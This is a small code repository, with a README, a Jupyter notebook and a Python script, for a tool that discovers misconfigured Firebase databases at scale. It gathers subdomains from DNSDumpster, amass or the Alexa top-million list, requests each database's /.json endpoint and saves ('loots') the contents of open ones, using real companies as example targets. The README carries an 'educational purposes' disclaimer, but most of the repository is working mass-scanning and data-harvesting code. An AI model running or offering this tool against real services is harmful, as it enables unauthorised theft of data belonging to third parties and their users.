├── LICENSE ├── README.md ├── firebase.ipynb ├── firebase.py └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Turr0n 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # firebase 2 | Exploiting vulnerable/misconfigured [Firebase](https://firebase.google.com/) databases 3 | 4 | ## Disclaimer: The provided software is meant for educational purposes only. Use this at your own discretion, the creator cannot be held responsible for any damages caused. Please, use responsibly! 5 | 6 | ### Prerequisites 7 | Non-standard python modules: 8 | * [dnsdumpster](https://github.com/PaulSec/API-dnsdumpster.com) 9 | * [bs4](http://beautiful-soup-4.readthedocs.io/en/latest/) 10 | * [requests](https://github.com/requests/requests) 11 | 12 | ### Installation 13 | If the following commands run successfully, you are ready to use the script: 14 | ``` 15 | git clone https://github.com/Turr0n/firebase.git 16 | cd firebase 17 | pip install -r requirements.txt 18 | ``` 19 | 20 | ### Usage 21 | ``` 22 | python3 firebase.py [-h] [--dnsdumpster] [-d /path/to/file.htm] [-o results.json] [-l /path/to/file] [-c 100] [-p 4] 23 | ``` 24 | Arguments: 25 | ``` 26 | -h Show the help message 27 | -d Absolute path to the downloaded HTML file. 28 | -o Output file name. Default: results.json 29 | -c Crawl for domains in the top-1m by Alexa. Set how many domains to crawl, for example: 100. Up to 1000000 30 | -p How many processes to execute. Default: 1 31 | -l Path to a file containing the DBs to crawl. One DB name per line. This option can't be used with -d or -c 32 | --dnsdumpster Use the DNSDumpster API to gather DBs 33 | --just-v Ignore "non-vulnerable" DBs 34 | --amass Path of the output file of an amass scan ([-o] argument) 35 | ``` 36 | 37 | Example: 38 | ``` python3 firebase.py -p 4 -f results_1.json -c 150 --dnsdumpster``` This will lookup the first 150 domains in the Alexa file aswell as the DBs provided by DNSDumpster. The results will be saved to ```results_1.json``` and the whole script will execute using 4 parallel processes 39 | 40 | The script will create a json file containing the gathered vulnerable databases and their dumped contents. Each database has a status: 41 | * -2: it's not vulnerable 42 | * -1: DB doesn't exists 43 | * 0: further explotation may be possible 44 | * 1: vulnerable 45 | 46 | For a better results head to [pentest-tools.com](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) and in its subdomain scanner introduce the following domain: ```firebaseio.com```. Once the scan has finished, save the page HTML(CRL+S) and use the ```-d [path]``` argument, this will allow the script to analyze the subdomains discovered by that service. Further subdomain crawlers might get supported. 47 | 48 | Now we support the [amass](https://github.com/caffix/amass) scanner by @caffix! By running any desired scann with that tool against ``firebaseio.com`` using the ``-o`` argument, the script will be able to digest the output file and crawl for the discovered DBs. 49 | 50 | Firebase DBs work using this structure: ```https://[DB name].firebaseio.com/```. If you are using the ```-l [path]``` argument, the supplied file needs to contain a [DB name] per line, for example: 51 | ``` 52 | airbnb 53 | twitter 54 | microsoft 55 | ``` 56 | 57 | Using that file will check for these DBs: ```https://airbnb.firebaseio.com/.json, https://twitter.firebaseio.com/.json, https://microsoft.firebaseio.com/.json``` 58 | 59 | ### Credits 60 | 61 | This script is heavily based on the work by the Mobile Threat Team from [appthority](https://www.appthority.com/mobile-threat-center/blog/appthority-discovers-thousands-of-apps-with-firebase-vulnerability-exposing-sensitive-data/). All credits for the reasearch belong to them. 62 | 63 | To download the domains from the Alexa's 1 million top domains file, the [script](https://gist.github.com/evilpacket/3628941) by @evilpacket is used. 64 | -------------------------------------------------------------------------------- /firebase.ipynb: -------------------------------------------------------------------------------- 1 | { 2 | "cells": [ 3 | { 4 | "cell_type": "code", 5 | "execution_count": 1, 6 | "metadata": {}, 7 | "outputs": [ 8 | { 9 | "name": "stdout", 10 | "output_type": "stream", 11 | "text": [ 12 | "Gathering subdomains using DNSDumpster...\n" 13 | ] 14 | } 15 | ], 16 | "source": [ 17 | "from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI\n", 18 | "\n", 19 | "print('Gathering subdomains using DNSDumpster...')\n", 20 | "results = DNSDumpsterAPI().search('firebaseio.com')\n", 21 | "domains = [domain['domain'] for domain in results['dns_records']['host']]" 22 | ] 23 | }, 24 | { 25 | "cell_type": "code", 26 | "execution_count": 2, 27 | "metadata": {}, 28 | "outputs": [ 29 | { 30 | "name": "stdout", 31 | "output_type": "stream", 32 | "text": [ 33 | "Gathering subdomains through the downloaded file...\n" 34 | ] 35 | } 36 | ], 37 | "source": [ 38 | "from bs4 import BeautifulSoup\n", 39 | "\n", 40 | "print('Gathering subdomains through the downloaded file...')\n", 41 | "with open('subdomains.html', 'r') as f:\n", 42 | " s = BeautifulSoup(f.read(), 'html.parser')\n", 43 | " \n", 44 | "table = s.find('div', class_='col-xs-12').find('table')\n", 45 | "domains.extend([row.find('a')['href'] for row in table.find('tbody').find_all('tr')[:-1]])" 46 | ] 47 | }, 48 | { 49 | "cell_type": "code", 50 | "execution_count": 15, 51 | "metadata": { 52 | "collapsed": true 53 | }, 54 | "outputs": [], 55 | "source": [ 56 | "import requests\n", 57 | "\n", 58 | "def clean(domain):\n", 59 | " if domain.count('http://') == 0:\n", 60 | " url = ('https://{}/.json').format(domain)\n", 61 | " else:\n", 62 | " domain = domain.replace('http', 'https')\n", 63 | " url = ('{}.json').format(domain)\n", 64 | " return url\n", 65 | "\n", 66 | "def work(url):\n", 67 | " r = requests.get(url).json()\n", 68 | " if 'error' in r.keys():\n", 69 | " if r['error'] == 'Permission denied':\n", 70 | " return {'status':-1, 'url':url}\n", 71 | " else:\n", 72 | " return {'status':0, 'url':url, 'data':r}\n", 73 | " else:\n", 74 | " return {'status':1, 'url':url, 'data':r}" 75 | ] 76 | }, 77 | { 78 | "cell_type": "code", 79 | "execution_count": 16, 80 | "metadata": {}, 81 | "outputs": [ 82 | { 83 | "name": "stdout", 84 | "output_type": "stream", 85 | "text": [ 86 | "Cleaning and looting!\n" 87 | ] 88 | } 89 | ], 90 | "source": [ 91 | "print('Cleaning and looting!')\n", 92 | "urls = map(clean, domains)\n", 93 | "loot = list(map(work, urls))" 94 | ] 95 | }, 96 | { 97 | "cell_type": "code", 98 | "execution_count": 17, 99 | "metadata": {}, 100 | "outputs": [ 101 | { 102 | "name": "stdout", 103 | "output_type": "stream", 104 | "text": [ 105 | "Saving results to results.json\n" 106 | ] 107 | } 108 | ], 109 | "source": [ 110 | "import json\n", 111 | "\n", 112 | "print('Saving results to results.json')\n", 113 | "with open('results.json', 'w') as f:\n", 114 | " json.dump(loot, f)" 115 | ] 116 | }, 117 | { 118 | "cell_type": "code", 119 | "execution_count": 36, 120 | "metadata": {}, 121 | "outputs": [ 122 | { 123 | "name": "stdout", 124 | "output_type": "stream", 125 | "text": [ 126 | "Secure databases found: 10\n", 127 | "Possible vulnerable databases found: 10\n", 128 | "Vulnerable databases found: 10\n" 129 | ] 130 | } 131 | ], 132 | "source": [ 133 | "l = {'1':0, '0':0, '-1':0}\n", 134 | "\n", 135 | "for result in loot:\n", 136 | " l[str(result['status'])] +=1\n", 137 | "\n", 138 | "print('Secure databases found: {}'.format(l['-1']))\n", 139 | "print('Possible vulnerable databases found: {}'.format(l['0']))\n", 140 | "print('Vulnerable databases found: {}'.format(l['1']))" 141 | ] 142 | } 143 | ], 144 | "metadata": { 145 | "kernelspec": { 146 | "display_name": "Python 3", 147 | "language": "python", 148 | "name": "python3" 149 | }, 150 | "language_info": { 151 | "codemirror_mode": { 152 | "name": "ipython", 153 | "version": 3 154 | }, 155 | "file_extension": ".py", 156 | "mimetype": "text/x-python", 157 | "name": "python", 158 | "nbconvert_exporter": "python", 159 | "pygments_lexer": "ipython3", 160 | "version": "3.5.2" 161 | } 162 | }, 163 | "nbformat": 4, 164 | "nbformat_minor": 2 165 | } 166 | -------------------------------------------------------------------------------- /firebase.py: -------------------------------------------------------------------------------- 1 | from argparse import ArgumentParser 2 | from multiprocessing import Pool 3 | from time import sleep 4 | import requests 5 | import os.path 6 | import json 7 | import sys 8 | 9 | def args(): 10 | parser = ArgumentParser() 11 | group = parser.add_mutually_exclusive_group() 12 | 13 | group.add_argument('-c', dest='crawl_top', required=False, default=False, type=int, help='Crawl for domains in the top-1m by Alexa. Set how many domains to crawl, for example: 100. Up to 1000000') 14 | group.add_argument('-l', dest='list', required=False, default=False, help='Path to a file containing the DBs names to be checked. One per file') 15 | parser.add_argument('-o', dest='fn', required=False, default='results.json', help='Output file name. Default: results.json') 16 | parser.add_argument('-d', dest='path', required=False, default=False, help="Absolute path to the downloaded HTML file") 17 | parser.add_argument('-p', dest='process', required=False, default=1, type=int, help='How many processes to execute') 18 | parser.add_argument('--dnsdumpster', action='store_true', required=False, default=False, help='Use the DNSDumpster API to gather DBs') 19 | parser.add_argument('--just-v', action='store_true', required=False, default=False, help='Ignore non-vulnerable DBs') 20 | parser.add_argument('--amass', dest='amass', required=False, default=False, help='Path to the output file of an amass scan ([-o] argument)') 21 | 22 | if len(sys.argv) == 1: 23 | parser.error("No arguments supplied.") 24 | sys.exit() 25 | 26 | return parser.parse_args() 27 | 28 | 29 | def clean(domain): 30 | ''' 31 | Clean the url so they are sutiable to be crawled. 32 | ''' 33 | if domain.count('http://') == 0: 34 | url = ('https://{}/.json').format(domain) 35 | else: 36 | domain = domain.replace('http', 'https') 37 | url = ('{}.json').format(domain) 38 | return url 39 | 40 | 41 | def worker(url): 42 | ''' 43 | Main function in charge of the bulk of the crawling, it assess a status to 44 | each DB depending on the response. 45 | ''' 46 | print('Crawling {} ...'.format(url)) 47 | sleep(0.5) #a bit of delay to not abuse in excess the servers 48 | try: 49 | r = requests.get(url).json() 50 | except requests.exceptions.RequestException as e: 51 | print(e) 52 | 53 | try: 54 | if 'error' in r.keys(): 55 | if r['error'] == 'Permission denied' and not args_.just_v: 56 | return {'status':-2, 'url':url} #successfully protected 57 | elif r['error'] == '404 Not Found' and not args_.just_v: 58 | return {'status':-1, 'url':url} #doesn't exist 59 | elif not args_.just_v: 60 | return {'status':0, 'url':url} #maybe there's a chance for further explotiation 61 | else: 62 | return {'status':1, 'url':url, 'data':r} #vulnerable 63 | except AttributeError: 64 | ''' 65 | Some DBs may just return null 66 | ''' 67 | if not args_.just_v: 68 | return {'status':0, 'url':url} 69 | 70 | 71 | def load_file(): 72 | ''' 73 | Parse the HTML file with the results of the pentest-tools subdomains scanner. 74 | ''' 75 | try: 76 | from bs4 import BeautifulSoup 77 | 78 | with open(args_.path, 'r') as f: 79 | print('Gathering subdomains through the downloaded file...') 80 | s = BeautifulSoup(f.read(), 'html.parser') 81 | 82 | table = s.find('div', class_='col-xs-12').find('table') 83 | return [row.find('a')['href'] for row in table.find('tbody').find_all('tr')[:-1]] 84 | 85 | except IOError as e: 86 | raise e 87 | 88 | 89 | def down_tops(): 90 | ''' 91 | Download the specified number of domains in the Alexa's 1M file. 92 | Credits for the script to @evilpacket 93 | https://gist.github.com/evilpacket/3628941 94 | ''' 95 | from subprocess import Popen 96 | command = "wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -"+str(args_.crawl_top)+" > top-"+str(args_.crawl_top)+".txt; rm top-1m.csv*" 97 | 98 | try: 99 | Popen(command, shell=True).wait() 100 | except Exception: 101 | raise Exception 102 | 103 | 104 | def tops(): 105 | ''' 106 | Gather the required number of top domains. Download the file if it 107 | hasn't been downloaded. Then, repare the urls to be crawled. 108 | ''' 109 | top_doms = set() 110 | fn = 'top-{}.txt'.format(args_.crawl_top) 111 | if not os.path.isfile(fn): 112 | down_tops() 113 | 114 | print('Retrieving {} top domains'.format(args_.crawl_top)) 115 | with open(fn, 'r') as f: 116 | [top_doms.add(line.split('.')[0]) for line in f] 117 | 118 | top_doms = ['https://{}.firebaseio.com/.json'.format(dom) for dom in top_doms] 119 | return top_doms 120 | 121 | 122 | def amass(): 123 | ''' 124 | From an amass scan output file([-o] argument), gather the DBs urls to crawl. 125 | ''' 126 | with open(args_.amass) as f: 127 | dbs = ['https://{}/.json'.format(line.rstrip()) for line in f] 128 | 129 | return dbs 130 | 131 | 132 | def dns_dumpster(): 133 | from dnsdumpster.DNSDumpsterAPI import DNSDumpsterAPI 134 | 135 | print('Gathering subdomains using DNSDumpster...') 136 | results = DNSDumpsterAPI().search('firebaseio.com') 137 | 138 | return [domain['domain'] for domain in results['dns_records']['host']] 139 | 140 | 141 | if __name__ == '__main__': 142 | args_ = args() 143 | if not args_.list: 144 | dbs = [] 145 | 146 | if args_.dnsdumpster: 147 | dbs.extend(dns_dumpster()) 148 | 149 | if args_.path: 150 | dbs.extend(load_file()) 151 | 152 | urls = list(set(map(clean, dbs))) 153 | if args_.crawl_top: 154 | urls.extend(tops()) 155 | 156 | if args_.amass: 157 | urls.extend(amass()) 158 | 159 | print('\nLooting...') 160 | p = Pool(args_.process) 161 | loot = [result for result in list(p.map(worker, urls)) if result != None] 162 | 163 | else: 164 | urls = set() 165 | with open(args_.list, 'r') as f: 166 | [urls.add('https://{}.firebaseio.com/.json'.format(line.rstrip())) for line in f] 167 | 168 | p = Pool(args_.process) 169 | loot = [result for result in list(p.map(worker, urls)) if result != None] 170 | 171 | 172 | 173 | print('Saving results to {}\n'.format(args_.fn)) 174 | with open(args_.fn, 'w') as f: 175 | json.dump(loot, f) 176 | 177 | l = {'1':0, '0':0, '-1':0, '-2':0} 178 | for result in loot: 179 | l[str(result['status'])] += 1 180 | 181 | print('404 DBs: {}'.format(l['-2'])) 182 | print('Secure DBs: {}'.format(l['-1'])) 183 | print('Possible vulnerable DBs: {}'.format(l['0'])) 184 | print('Vulnerable DBs: {}'.format(l['1'])) 185 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | bs4 2 | requests 3 | dnsdumpster --------------------------------------------------------------------------------